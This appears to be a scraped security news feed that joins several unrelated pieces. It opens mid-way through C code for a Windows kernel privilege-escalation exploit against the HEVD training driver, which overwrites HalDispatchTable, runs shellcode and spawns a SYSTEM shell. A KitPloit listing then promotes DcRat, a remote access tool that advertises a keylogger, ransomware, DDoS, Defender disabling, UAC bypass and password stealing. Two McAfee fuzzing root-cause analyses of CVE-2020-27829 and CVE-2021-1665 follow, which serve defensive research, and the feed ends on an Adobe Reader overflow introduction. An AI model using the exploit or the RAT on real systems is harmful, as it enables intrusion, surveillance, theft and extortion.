        "NtQueryIntervalProfile"
    );

    // Error handling
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
        exit(1);
    }

    // Print update for found ntdll!NtQueryIntervalProfile
    printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

    // Calling nt!NtQueryIntervalProfile
    ULONG exploit = 0;
    NtQueryIntervalProfile(
        0x1234,
        &exploit
    );

    // Print update
    printf("[+] Successfully executed the shellcode!\n");

    // Leverage arbitrary write for restoration purposes

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of the preserved value at [nt!HalDispatchTable+0x8])
    mainObject.Name = &halDispatch;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully restored [nt!HalDispatchTable+0x8]!\n");

    // Print update for NT AUTHORITY\SYSTEM shell
    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

    // Spawning an NT AUTHORITY\SYSTEM shell
    system("cmd.exe /c cmd.exe /K cd C:\\");
}

void main(void)
{
    // Open a handle to the driver
    printf("[+] Obtaining handle to HEVD.sys...\n");

    HANDLE drvHandle = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0x0,
        NULL,
        OPEN_EXISTING,
        0x0,
        NULL
    );

    // Error handling
    if (drvHandle == (HANDLE)-1)
    {
        printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
    }
    else
    {
        readwritePrimitive(drvHandle);
    }
}
☑ ★ ✇ KitPloit - PenTest & Hacking Tools

DcRat - A Simple Remote Tool Written In C#

By: Zion3R


DcRat is a simple remote tool written in C#


Introduction

Features
  • TCP connection with certificate verification, stable and secure
  • Server IP and port can be retrieved through a link
  • Multi-server, multi-port support
  • Plugin system through DLLs, which has strong extensibility
  • Super tiny client size (about 40~50 KB)
  • Data transfer with msgpack (better than JSON and other formats)
  • Logging system recording all events

Functions
  • Remote shell
  • Remote desktop
  • Remote camera
  • Registry Editor
  • File management
  • Process management
  • Netstat
  • Remote recording
  • Process notification
  • Send file
  • Inject file
  • Download and Execute
  • Send notification
  • Chat
  • Open website
  • Modify wallpaper
  • Keylogger
  • File lookup
  • DDOS
  • Ransomware
  • Disable Windows Defender
  • Disable UAC
  • Password recovery
  • Open CD
  • Lock screen
  • Client shutdown/restart/upgrade/uninstall
  • System shutdown/restart/logout
  • Bypass Uac
  • Get computer information
  • Thumbnails
  • Auto task
  • Mutex
  • Process protection
  • Block client
  • Install with schtasks
  • etc

Deployment
  • Build: Visual Studio 2019
  • Runtime:
    • Server: .NET Framework 4.6.1
    • Client and others: .NET Framework 4.0

Support
  • The following systems (32 and 64 bit) are supported
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

TODO
  • Password recovery and other stealer (only chrome and edge are supported now)
  • Reverse Proxy
  • Hidden VNC
  • Hidden RDP
  • Hidden Browser
  • Client Map
  • Real time Microphone
  • Some fun function
  • Information Collection(Maybe with UI)
  • Support unicode in Remote Shell
  • Support Folder Download
  • Support more ways to install Clients
  • ……

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.


Download

Press here to download the latest release.


Attention

I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of this software. You are fully responsible for any use of the software and acknowledge that it is intended for educational and research purposes only. By downloading the software or its source code, you automatically agree to the above.


Thanks


☑ ★ ✇ McAfee Blogs

Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829

By: Hardik Shah

Introduction:

ImageMagick is a hugely popular open source software that is used in lot of systems around the world. It is available for the Windows, Linux, MacOS platforms as well as Android and iOS. It is used for editing, creating or converting various digital image formats and supports various formats like PNG, JPEG, WEBP, TIFF, HEIC and PDF, among others.

Google OSS Fuzz and other threat researchers have made ImageMagick the frequent focus of fuzzing, an extremely popular technique used by security researchers to discover potential zero-day vulnerabilities in open, as well as closed source software. This research has resulted in various vulnerability discoveries that must be addressed on a regular basis by its maintainers. Despite the efforts of many to expose such vulnerabilities, recent fuzzing research from McAfee has exposed new vulnerabilities involving processing of multiple image formats, in various open source and closed source software and libraries including ImageMagick and Windows GDI+.

Fuzzing ImageMagick:

Fuzzing open source libraries has been covered in a detailed blog “Vulnerability Discovery in Open Source Libraries Part 1: Tools of the Trade” last year. Fuzzing ImageMagick is very well documented, so we will be quickly covering the process in this blog post and will focus on the root cause analysis of the issue we have found.

Compiling ImageMagick with AFL:

ImageMagick has lot of configuration options which we can see by running following command:

$./configure --help

We can customize various parameters as per our needs. To compile and install ImageMagick with AFL for our case, we can use following commands:

$CC=afl-gcc CXX=afl-g++ CFLAGS="-ggdb -O0 -fsanitize=address,undefined -fno-omit-frame-pointer" LDFLAGS="-ggdb -fsanitize=address,undefined -fno-omit-frame-pointer" ./configure

$ make -j$(nproc)

$sudo make install

This will compile and install ImageMagick with AFL instrumentation. The binary we will be fuzzing is “magick”, also known as “magick tool”. It has various options, but we will be using its image conversion feature to convert our image from one format to another.

A simple command would include the following:

$ magick <input file> <output file>

This command will convert an input file to an output file format. We will be fuzzing this with AFL.

Collecting Corpus:

Before we start fuzzing, we need to have a good input corpus. One way of collecting corpus is to search on Google or GitHub. We can also use existing test corpus from various software. A good test corpus is available on the  AFL site here: https://lcamtuf.coredump.cx/afl/demo/

Minimizing Corpus:

Corpus collection is one thing, but we also need to minimize the corpus. The way AFL works is that it will instrument each basic block so that it can trace the program execution path. It maintains a shared memory as a bitmap and it uses an algorithm to check new block hits. If a new block hit has been found, it will save this information to bitmap.

Now it may be possible that more than one input file from the corpus can trigger the same path, as we have collected sample files from various sources, we don’t have any information on what paths they will trigger at the runtime. If we use this corpus without removing such files, then we end up wasting time and CPU cycles. We need to avoid that.

Interestingly AFL offers a utility called “afl-cmin” which we can use to minimize our test corpus. This is a recommended thing to do before you start any fuzzing campaign. We can run this as follows:

$afl-cmin -i <input directory> -o <output directory> -- magick @@ /dev/null

This command will minimize the input corpus and will keep only those files which trigger unique paths.

Running Fuzzers:

After we have minimized the corpus, we can start fuzzing. To fuzz, we use the following command:

$afl-fuzz -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

This will only run a single instance of AFL utilizing a single core. If we have a multicore processor, we can run multiple instances of AFL, with one Master and n Slaves, where n is the number of available CPU cores.

To check available CPU cores, we can use this command:

$nproc

This will give us the number of CPU cores (depending on the system) as follows:

In this case there are eight cores. So, we can run one Master and up to seven Slaves.

To run the master instance, we can use the following command:

$afl-fuzz -M Master -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

We can run slave instances using the following commands:

$afl-fuzz -S Slave1 -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

$afl-fuzz -S Slave2 -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

The same can be done for each slave. We just need to use an argument -S and can use any name like slave1, slave2, etc.

Results:

Within a few hours of beginning this fuzzing campaign, we found one crash related to an out-of-bounds read inside heap memory. We reported this issue to ImageMagick, and they were very prompt in fixing it with a patch the very next day. ImageMagick has released a new build with version 7.0.46 to fix this issue. This issue was assigned CVE-2020-27829.

Analyzing CVE-2020-27829:

On checking the POC file, we found that it was a TIFF file.

When we open this file with ImageMagick using the following command:

$magick poc.tif /dev/null

As a result, we see a crash like below:

As is clear from the above log, the program was trying to read 1 byte past the allocated heap buffer, and therefore ASAN caused this crash. This can at least lead to an ImageMagick crash on systems running a vulnerable version of ImageMagick.

Understanding TIFF file format:

Before we start debugging this issue to find a root cause, it is necessary to understand the TIFF file format. Its specification is very well described here: http://paulbourke.net/dataformats/tiff/tiff_summary.pdf.

In short, a TIFF file has three parts:

  1. Image File Header (IFH) – Contains information such as the file identifier, version, and the offset of the IFD (see the sketch after this list).
  2. Image File Directory (IFD) – Contains information on the height, width, and depth of the image, the number of colour planes, etc. It also contains various TAGs like ColorMap, PageNumber, BitsPerSample, FillOrder, etc.
  3. Bitmap data – Contains various image data like strips, tiles, etc.
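As a reference point, here is a minimal sketch of the 8-byte Image File Header from item 1; the field names are illustrative and not taken from any particular library:

#include <stdint.h>

#pragma pack(push, 1)
typedef struct TiffImageFileHeader {
    uint16_t byte_order;    // 0x4949 ("II", little-endian) or 0x4D4D ("MM", big-endian)
    uint16_t magic;         // always 42 (0x002A) for classic TIFF
    uint32_t ifd_offset;    // file offset of the first Image File Directory (0xa0 in the POC file)
} TiffImageFileHeader;
#pragma pack(pop)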

We can use the tiffinfo utility from libtiff to gather various information about the POC file. This allows us to see the following information, like the width, height, samples per pixel, rows per strip, etc.:

There are a few things to note here:

TIFF Dir offset is: 0xa0

Image width is: 3 and length is: 32

Bits per sample is: 9

Sample per pixel is: 3

Rows per strip is: 1024

Planar configuration is: single image plane.

We will be using this data moving forward in this post.

Debugging the issue:

As we can see in the crash log, the program crashes in the “PushQuantumPixel” function, at line 256 of quantum-import.c:

On checking the “PushQuantumPixel” function in “MagickCore/quantum-import.c”, we can see the following code at line 256 where the program crashes:

We can see the following:

  • “pixels” appears to be a character array
  • inside a for loop its value is read and assigned to quantum_info->state.pixel
  • its address is incremented by one on each loop iteration

The program crashes at this location while reading the value of “pixels”, which means the pointer has moved out of bounds of the allocated heap memory.
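To make the pattern concrete, here is a minimal sketch of the kind of loop described above. It is an illustration based on the observations just listed, not ImageMagick's exact source, and the QuantumStateSketch type is invented for the example:

#include <stddef.h>

struct QuantumStateSketch { size_t pixel; size_t bits; };

// Read enough bytes from the strip buffer to cover "depth" bits, one byte per
// iteration. Nothing here knows how large the buffer really is, so once the
// caller has advanced the pointer past the 248-byte allocation, the read below
// lands out of bounds.
static void PushQuantumPixelSketch(QuantumStateSketch *state,
                                   const unsigned char **pixels, size_t depth)
{
    for (size_t i = 0; i < depth; i += 8)
    {
        state->pixel = (size_t) **pixels;  // value read from the heap buffer (the crash site)
        state->bits  = 8;
        (*pixels)++;                       // address increased by one each iteration
    }
}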

Now we need to figure out the following:

  1. What is “pixels” and what data does it contain?
  2. Why is it crashing?
  3. How was this fixed?

Finding root cause:

To start with, we can check the “ReadTIFFImage” function in the coders/tiff.c file and see that it allocates memory using a call to “AcquireQuantumMemory”, which is described in the documentation here:

https://imagemagick.org/api/memory.php:

“Returns a pointer to a block of memory at least count * quantum bytes suitably aligned for any use.

The format of the “AcquireQuantumMemory” method is:

void *AcquireQuantumMemory(const size_t count,const size_t quantum)

A description of each parameter follows:

count – the number of objects to allocate contiguously.

quantum – the size (in bytes) of each object.”

In this case, the two parameters passed to this function are “extent” and “sizeof(*strip_pixels)”.

We can see that “extent” is calculated as follows in the code below:

There is a function, TIFFStripSize(tiff), which returns the size of a strip of data, as described in the libtiff documentation here:

http://www.libtiff.org/man/TIFFstrip.3t.html

In our case it returns 224. In the code above, “image->columns * sizeof(uint64)” is also added to the extent, contributing another 24 bytes, so the extent value becomes 248.

So, this extent value of 248 and sizeof(*strip_pixels), which is 1, are passed to the “AcquireQuantumMemory” function, and a total of 248 bytes gets allocated.

This is how memory is allocated.
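Putting the pieces together, the allocation path looks roughly like the following sketch (variable names follow the coders/tiff.c code described above, with the concrete values for this POC in comments; this is an illustration, not the verbatim source):

extent = TIFFStripSize(tiff);                /* 224 for this POC            */
extent += image->columns * sizeof(uint64);   /* + 3*8 = 24 -> extent = 248  */
strip_pixels = (unsigned char *) AcquireQuantumMemory(extent, sizeof(*strip_pixels));  /* 248*1 = 248 bytes */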

“strip_pixels” is a pointer to the newly allocated memory.

Note that these are 248 bytes of newly allocated memory. Since we are building with ASAN, each byte initially contains “0xbe”, ASAN's default fill value for newly allocated memory:

https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_flags.inc

The memory start location is 0x6110000002c0 and the end location is 0x6110000003b7, which is 248 bytes total.

This memory is set to 0 by a “memset” call and assigned to a variable “p”, as shown in the image below. Note that “p” is the pointer used to traverse this memory region as the program continues:

Later on, we see a call to “TIFFReadEncodedPixels”, which reads strip data from the TIFF file and stores it in the newly allocated 248-byte “strip_pixels” buffer (documentation here: http://www.libtiff.org/man/TIFFReadEncodedStrip.3t.html):

To understand what this TIFF file data is, we again refer to the TIFF file structure. There is a tag called “StripOffsets” whose value is 8, which specifies the offset of the strip data inside the TIFF file:

We see the following when we check data at offset 8 in the TIFF file:

We see the following when we print the data in “strip_pixels” (note that it is in little endian format):

So “strip_pixels” is the actual data from the TIFF file from offset 8. This will be traversed through pointer “p”.

Inside the “ReadTIFFImage” function there are two nested for loops.

  • The first “for loop” iterates “samples_per_pixel” times, which is 3.
  • The second “for loop” iterates over the pixel data “image->rows” times, which is 32. This inner loop executes 32 times, once per row of the image, regardless of the allocated buffer size.
  • Inside this second for loop, we can see something like this:

  • We can notice that the “ImportQuantumPixel” function uses the “p” pointer to read data from “strip_pixels”, and after each call to “ImportQuantumPixel” the value of “p” is increased by “stride”.

Here, “stride” is calculated by calling the “TIFFVStripSize()” function, which according to the documentation returns the number of bytes in a strip with nrows rows of data. In this case it is 14, so pointer “p” is incremented by 14 (0xE) on every pass of the second for loop.
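The two nested loops therefore follow a pattern along these lines (a simplified sketch of the logic described above, not the exact coders/tiff.c source):

p = strip_pixels;
for (i = 0; i < samples_per_pixel; i++)          /* 3 iterations  */
{
    for (y = 0; y < image->rows; y++)            /* 32 iterations */
    {
        (void) ImportQuantumPixels(image, (CacheView *) NULL, quantum_info,
                                   quantum_type, p, exception);
        p += stride;                             /* stride = 14 for this POC */
    }
}
/* 32 rows * 14 bytes = 448 bytes walked, but only 248 bytes were allocated. */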

If we print the image structure that is passed to the “ImportQuantumPixels” function as a parameter, we see the following:

Here we can see that the columns value is 3, the rows value is 32, and the depth is 9. Checking the POC TIFF file, these are taken from the ImageWidth, ImageLength, and BitsPerSample values:

Ultimately, control reaches “ImportRGBQuantum” and then the “PushQuantumPixel” function, and one of the arguments to this function is the pixel data pointed to by “p”. Remember that this points to the memory that was previously allocated using the “AcquireQuantumMemory” function, that its length is 248 bytes, and that the value of “p” is increased by 14 on every iteration.

The “PushQuantumPixel” function is used to read pixel data from “p” into ImageMagick's internal pixel data storage. It contains a for loop responsible for reading data from the provided 248-byte pixels buffer into a “quantum_info” structure. This loop reads data from pixels incrementally and saves it in the “quantum_info->state.pixel” field.

The root cause here is that there are no proper bounds checks: while reading the strip data inside the for loop, the program tries to read data beyond the allocated heap buffer.

This causes a crash in ImageMagick as we can see below:

Root cause

Therefore, to summarize, the program crashes because:

  1. The program allocates 248 bytes of memory to process the image's strip data, and a pointer “p” points to this memory.
  2. Inside a for loop, this pointer is increased by 14 (0xE) once for each row of the image, which in this case is 32 rows.
  3. Based on this calculation, 32*14 = 448 bytes or more of memory are required, but only 248 bytes were actually allocated.
  4. The program reads data as if 448+ bytes of memory were available, while only 248 bytes exist, causing an out-of-bounds memory read.

How was it fixed?

If we check the patch diff, we can see that the following change was made to fix this issue:

Here, the second argument to “AcquireQuantumMemory” is multiplied by 2, increasing the total amount of memory and preventing the out-of-bounds read from heap memory. The total memory allocated becomes 248*2 = 496 bytes, as we can see below:
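In other words, the patched allocation looks roughly like this (a sketch of the change described above, not the verbatim diff):

strip_pixels = (unsigned char *) AcquireQuantumMemory(extent, 2*sizeof(*strip_pixels));  /* 248*2 = 496 bytes */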

Another issue with the fix:

A new version of ImageMagick, 7.0.46, was released to fix this issue. While the patch fixes the memory allocation, if we check the code below, we can see that the accompanying call to memset did not zero the proper amount of memory.

Memory was allocated as extent*2*sizeof(*strip_pixels), but the memset zeroed only extent*sizeof(*strip_pixels). This means half of the memory was set to 0 and the rest contained 0xbebebebe, ASAN's default fill for newly allocated memory.
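A sketch of that mismatch (illustrative, not the verbatim source): the buffer now spans extent*2 bytes, but the memset clears only the first extent bytes, so the second half keeps the 0xbe ASAN fill pattern.

strip_pixels = (unsigned char *) AcquireQuantumMemory(extent, 2*sizeof(*strip_pixels));  /* 496 bytes allocated    */
(void) memset(strip_pixels, 0, extent*sizeof(*strip_pixels));                            /* only 248 bytes cleared */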

This has since been fixed in subsequent releases of ImageMagick by using extent=2*TIFFStripSize(tiff); in the following patch:

https://github.com/ImageMagick/ImageMagick/commit/a5b64ccc422615264287028fe6bea8a131043b59#diff-0a5eef63b187504ff513056aa8fd6a7f5c1f57b6d2577a75cff428c0c7530978

Conclusion:

Processing image files requires a deep understanding of many different file formats, so it is easy for something to be implemented incorrectly or missed entirely. This can lead to various vulnerabilities in image processing software. Some of these vulnerabilities can lead to denial of service, and some can lead to remote code execution affecting every installation of such popular software.

Fuzzing plays an important role in finding vulnerabilities that are often missed by developers and during testing. We at McAfee constantly fuzz various closed source as well as open source software to help secure it. We work very closely with vendors and practice responsible disclosure. This shows McAfee’s commitment to securing software and protecting our customers from various threats.

We will continue to fuzz various software and work with vendors to help mitigate the risk arising from such threats.

We would like to thank the ImageMagick team for quickly resolving this issue within 24 hours and releasing a new version to fix it.

The post Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829 appeared first on McAfee Blogs.

☑ ★ ✇ McAfee Blogs

Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+

By: Hardik Shah

Introduction

Microsoft Windows Graphics Device Interface+, also known as GDI+, allows various applications to use graphics functionality on video displays as well as printers. Windows applications do not access graphics hardware directly; instead, they interact with GDI, which in turn interacts with the device drivers. In this way, there is an abstraction layer for Windows applications and a common set of APIs for everyone to use.

Because of the complexity of the formats it handles, GDI+ has a known history of vulnerabilities. We at McAfee continuously fuzz various open source and closed source software, including Windows GDI+. Over the last few years, we have reported several issues to Microsoft in various Windows components, including GDI+, and have received CVEs for them.

In this post, we detail our root cause analysis of one such vulnerability that we found using WinAFL: CVE-2021-1665 – GDI+ Remote Code Execution Vulnerability. This issue was fixed in January 2021 as part of a Microsoft patch.

What is WinAFL?

WinAFL is a Windows port of the popular Linux AFL fuzzer and is maintained by Ivan Fratric of Google Project Zero. WinAFL performs dynamic binary instrumentation using DynamoRIO and requires a program called a harness. A harness is simply a small program that calls the APIs we want to fuzz.

A simple harness for this is already provided with WinAFL; we only need to enable the “Image->GetThumbnailImage” code, which is commented out by default. Following is the harness code to fuzz the GDI+ Image object and the GetThumbnailImage API:
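For reference, a minimal sketch of such a harness might look as follows. The exported fuzzMe entry point and its two arguments are assumptions taken from the -target_method fuzzMe -nargs 2 options used in the fuzzing commands later in this post; the body simply builds an Image from the input file and requests a thumbnail from it:

#include <windows.h>
#include <gdiplus.h>
#pragma comment(lib, "gdiplus.lib")
using namespace Gdiplus;

// Target method instrumented by WinAFL: parse the input file and build a thumbnail.
extern "C" __declspec(dllexport) __declspec(noinline)
int fuzzMe(int argc, wchar_t** argv)
{
    Image *image = new Image(argv[1]);                 // create an Image object from the input file
    if (image != NULL && image->GetLastStatus() == Ok)
    {
        Image *thumbnail = image->GetThumbnailImage(100, 100, NULL, NULL);
        delete thumbnail;
    }
    delete image;
    return 0;
}

int wmain(int argc, wchar_t** argv)
{
    GdiplusStartupInput gdiplusStartupInput;
    ULONG_PTR gdiplusToken;
    GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL);
    fuzzMe(argc, argv);
    GdiplusShutdown(gdiplusToken);
    return 0;
}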

 

As you can see, this small piece of code simply creates a new Image object from the provided input file and then calls another function to generate a thumbnail image. This makes an excellent attack vector and can affect various Windows applications that use thumbnail images. In addition, it requires very little user interaction, so software that uses GDI+ and calls the GetThumbnailImage API is vulnerable.

Collecting Corpus:

A good corpus provides a sound foundation for fuzzing. For that, we can use Google or GitHub, test corpora shipped with various software, and public EMF files released for other vulnerabilities. We also generated a few test files by modifying sample code from Microsoft's site that produces an EMF file with EMFPlusDrawString and other records:

Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emfplus/07bda2af-7a5d-4c0b-b996-30326a41fa57

Minimizing Corpus:

After we have collected the initial corpus, we need to minimize it. For this we can use a utility called winafl-cmin.py, as follows:

winafl-cmin.py -D D:\\work\\winafl\\DynamoRIO\\bin32 -t 10000 -i inCorpus -o minCorpus -covtype edge -coverage_module gdiplus.dll -target_module gdiplus_hardik.exe -target_method fuzzMe -nargs 2 -- gdiplus_hardik.exe @@

How does WinAFL work?

WinAFL uses the concept of in-memory fuzzing. We provide a function name to WinAFL; it saves the program state at the start of that function, takes one input file from the corpus, mutates it, and feeds it to the function.

It monitors execution for any new code paths or crashes. If it finds a new code path, it considers the mutated file an interesting test case and adds it to the queue for further mutation. If it finds a crash, it saves the crashing file in the crashes folder.

The following picture shows the fuzzing flow:

Fuzzing with WinAFL:

Once we have compiled our harness program and collected and minimized the corpus, we can run the following command to fuzz our program with WinAFL:

afl-fuzz.exe -i minCorpus -o out -D D:\work\winafl\DynamoRIO\bin32 -t 20000 -coverage_module gdiplus.dll -fuzz_iterations 5000 -target_module gdiplus_hardik.exe -target_offset 0x16e0 -nargs 2 -- gdiplus_hardik.exe @@

Results:

We found a few crashes, and after triaging the unique ones we found a crash in “gdiplus!BuiltLine::GetBaselineOffset”, which looks as follows in the call stack below:

As can be seen in the above image, the program crashes while trying to read data from the memory address pointed to by edx+8. The registers ebx, ecx, and edx contain c0c0c0c0, which means that page heap is enabled for the binary. We can also see that c0c0c0c0 is being passed as a parameter to the “gdiplus!FullTextImager::RenderLine” function.

Patch Diffing to See If We Can Find the Root Cause

To figure out the root cause, we can use patch diffing: the IDA BinDiff plugin identifies what changes were made to the patched file. If we are lucky, we can find the root cause just by looking at the changed code. So, we generate IDB files for the patched and unpatched versions of gdiplus.dll and run the IDA BinDiff plugin to see the changes.

We can see that one new function was added in the patched file, and it appears to be a destructor for the BuiltLine object:

We can also see a few functions with a similarity score < 1; one such function is FullTextImager::BuildAllLines, shown below:

Now, just to confirm that this is really the function that was patched, we can run our test program with the POC in WinDbg and set a breakpoint on this function. We can see that the breakpoint is hit and the program no longer crashes:

As a next step, we need to identify what was changed in this function to fix the vulnerability. For that, we can check the function's flow graph, shown below. Unfortunately, there are too many changes to identify the vulnerability simply by looking at the diff:

The left side illustrates the unpatched DLL, while the right side shows the patched DLL:

  • Green indicates that the patched and unpatched blocks are the same.
  • Yellow blocks indicate that there are some changes between the unpatched and patched DLLs.
  • Red blocks call out differences between the DLLs.

If we zoom in on the yellow blocks, we can see the following:

We can note several changes. A few blocks were removed in the patched DLL, so patch diffing alone is not sufficient to identify the root cause of this issue. However, it presents valuable hints about where to look and what to look for when using other debugging methods such as WinDbg. A few observations we can spot from the BinDiff output above:

  • In the unpatched DLL, if we check carefully, we can see a call to the “GetuntrimmedCharacterCount” function and, later on, another call to the function “SetSpan::SpanVector”.
  • In the patched DLL, we can see a call to “GetuntrimmedCharacterCount” whose return value, stored in the EAX register, is checked. If it is zero, control jumps to another location: the newly added destructor for the BuiltLine object:

So we can assume that this is where the vulnerability was fixed. Now we need to figure out the following:

  1. Why does our program crash with the provided POC file?
  2. Which field in the file causes this crash?
  3. What is the value of that field?
  4. Which condition in the program causes this crash?
  5. How was it fixed?

EMF File Format:

EMF, also known as the Enhanced Metafile format, is used to store graphical images in a device-independent way. An EMF file consists of various variable-length records. It can contain definitions of various graphics objects, commands for drawing, and other graphics properties.

Credit: MS EMF documentation.

Generally, an EMF file consists of the following records:

  1. EMF Header – This contains information about EMF structure.
  2. EMF Records – These can be various variable-length records containing information about graphics properties, drawing order, and so forth.
  3. EMF EOF Record – This is the last record in EMF file.

The detailed specification of the EMF file format can be found on Microsoft's site at the following URL:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emf/91c257d7-c39d-4a36-9b1f-63e3f73d30ca

Locating the Vulnerable Record in the EMF File:

Generally, most issues in EMF are caused by malformed or corrupt records. We need to figure out which record type is causing this crash. If we look at the call stack, we see the following:

We can notice a call to the function “gdiplus!GdipPlayMetafileRecordCallback”.

By setting a breakpoint on this function and checking its parameters, we can see the following:

We can see that EDX contains a memory address and that the parameters given to this function are 0x00401c, 0x00000000, and 0x00000044.

Also, on checking the location pointed to by EDX, we can see the following:

If we check our POC EMF file, we can see that this data comes from the file at offset 0x15c:

By going through the EMF specification and manually parsing the records, we can easily figure out that this is an “EmfPlusDrawString” record, the format of which is shown below:

In our case:

Record Type = 0x401c EmfPlusDrawString record

Flags = 0x0000

Size = 0x50

Data size = 0x44

Brushid = 0x02

Format id = 0x01

Length = 0x14

Layoutrect = 00 00 00 00 00 00 00 00 FC FF C7 42 00 00 80 FF

String data =
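For reference, the fixed-size portion of an EmfPlusDrawString record lays out roughly as in the following sketch (field widths per the MS-EMFPLUS specification; the struct itself is written here only for illustration and is not a definition taken from GDI+):

#include <stdint.h>

#pragma pack(push, 1)
struct EmfPlusDrawStringHeader {
    uint16_t Type;          // 0x401C for EmfPlusDrawString
    uint16_t Flags;         // 0x0000 in this POC
    uint32_t Size;          // 0x50 - total record size
    uint32_t DataSize;      // 0x44 - size of the record data
    uint32_t BrushId;       // 0x02
    uint32_t FormatID;      // 0x01
    uint32_t Length;        // 0x14 - number of characters in StringData
    float    LayoutRect[4]; // x, y, width, height
    // UTF-16LE StringData of "Length" characters follows these fields
};
#pragma pack(pop)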

Now that we have located the record that seems to be causing the crash, the next step is to figure out why the program is crashing. If we debug and check the code, we can see that control reaches the function “gdiplus!FullTextImager::BuildAllLines”. When we decompile this code, we see something like this:

The following diagram shows the function call hierarchy:

The execution flow in summary:

  1. Inside the “Builtline::BuildAllLines” function there is a while loop in which the program allocates 0x60 bytes of memory and then calls “Builtline::BuiltLine”.
  2. The “Builtline::BuiltLine” function moves data into the newly allocated memory and then calls “BuiltLine::GetUntrimmedCharacterCount”.
  3. The return value of “BuiltLine::GetUntrimmedCharacterCount” is added to the loop counter, which is ECX. This process repeats while the loop counter (ECX) is less than the string length (EAX), which here is 0x14.
  4. The loop counter starts from 0, so the loop should terminate at 0x13, or it should terminate when the return value of “GetUntrimmedCharacterCount” is 0.
  5. But in the vulnerable DLL, the program does not terminate correctly because of the way the loop counter is increased. Here, “BuiltLine::GetUntrimmedCharacterCount” returns 0, which is added to the loop counter (ECX) and therefore does not increase its value. The code allocates another 0x60 bytes of memory and creates another line, corrupting data that later leads the program to crash. The loop is executed 21 times instead of 20.

In detail:

1. Inside “Builtline::BuildAllLines”, 0x60 (96) bytes of memory are allocated; in the debugger it looks as follows:

2. Then it calls the “BuiltLine::BuiltLine” function and moves the data to the newly allocated memory:

3. This happens inside a while loop, and there is a function call to “BuiltLine::GetUntrimmedCharacterCount”.

4. The return value of “BuiltLine::GetUntrimmedCharacterCount” is stored at location 0x12ff2ec. This value is 1, as can be seen below:

5. This value gets added to ECX:

6. Then there is a check that determines whether ECX < EAX. If true, the loop continues; otherwise execution jumps to another location:

7. In the vulnerable version, the loop does not exit when the return value of “BuiltLine::GetUntrimmedCharacterCount” is 0: the 0 is added to ECX, so ECX does not increase, and the loop executes one more time with an ECX value of 0x13. This leads to the loop being executed 21 times rather than 20, which is the root cause of the problem.

Also, after some debugging, we can figure out why EAX contains 0x14: it is read from the POC file at offset 0x174:

If we recall, this is the EmfPlusDrawString record and 0x14 is the length we mentioned before.

Later on, the program reaches the “FullTextImager::Render” function, which corrupts the value of EAX because it reads the unused memory:

This will be passed as an argument to the “FullTextImager::RenderLine” function:

Later, the program crashes while trying to access this location.

Our program was crashing while processing the EmfPlusDrawString record inside the EMF file, accessing an invalid memory location while handling the string data field. Essentially, the program did not verify the return value of the “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function, which resulted in a different program path that corrupted registers and various memory values, ultimately causing the crash.

How was this issue fixed?

As we figured out by looking at the patch diff above, a check was added on the return value of the “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function.

If the returned value is 0, the program zeroes EBX (which contains the counter) via XOR and jumps to a location that calls the destructor for the BuiltLine object:

Here is the destructor that prevents the issue:

Conclusion:

GDI+ is a very commonly used Windows component, and a vulnerability like this can affect billions of systems across the globe. We recommend that users apply the proper updates and keep their Windows deployments current.

We at McAfee continuously fuzz various open source and closed source libraries and work with vendors to fix such issues, disclosing them responsibly and giving vendors adequate time to fix the issue and release updates as needed.

We are thankful to Microsoft for working with us on fixing this issue and releasing an update.

 

 

 

 

The post Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+ appeared first on McAfee Blogs.

☑ ★ ✇ Exodus Intelligence

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

By: Exodus Intel VRT

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC prior to version 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs during the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. It occurs when embedded JavaScript calls functions located in the IA32.api module, which handles internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL whose encoding differs from that of the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in copying twice the number of bytes of the source ANSI string (the relative URL) into a properly sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-21017

